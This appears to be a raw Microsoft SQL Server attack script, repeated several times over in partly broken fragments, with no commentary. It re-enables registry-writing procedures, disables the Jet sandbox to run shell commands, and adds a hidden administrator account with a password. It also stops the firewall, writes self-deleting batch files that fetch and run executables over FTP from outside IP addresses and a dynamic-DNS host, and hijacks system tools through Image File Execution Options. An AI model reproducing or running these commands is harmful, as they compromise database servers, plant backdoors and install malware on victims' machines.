-- network protocol: TCP/IP
set quoted_identifier on
set implicit_transactions off
set cursor_close_on_commit off
set ansi_warnings on
set ansi_padding on
set ansi_nulls on
set concat_null_yields_null on
set language 簡體中文
set dateformat ymd
set datefirst 7
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1
use master;dbcc addextendedproc ("xp_regwrite","xpstar.dll");dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 218.60.133.107>dboysb.sys&echo xiaonao>>dboysb.sys&echo 469989261>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
dbcc addextendedproc ("xp_regwrite","xpstar.dll")
dbcc addextendedproc ("xp_regdeletekey","xpstar.dll")
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe'
("xp_regdeletekey","xpstar.dll");exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 218.60.133.107>dboysb.sys&echo xiaonao>>dboysb.sys&echo 469989261>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
use master;
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open stra.3322.org>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 61.132.118.88>dboysb.sys&echo 123>>dboysb.sys&echo 123>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe'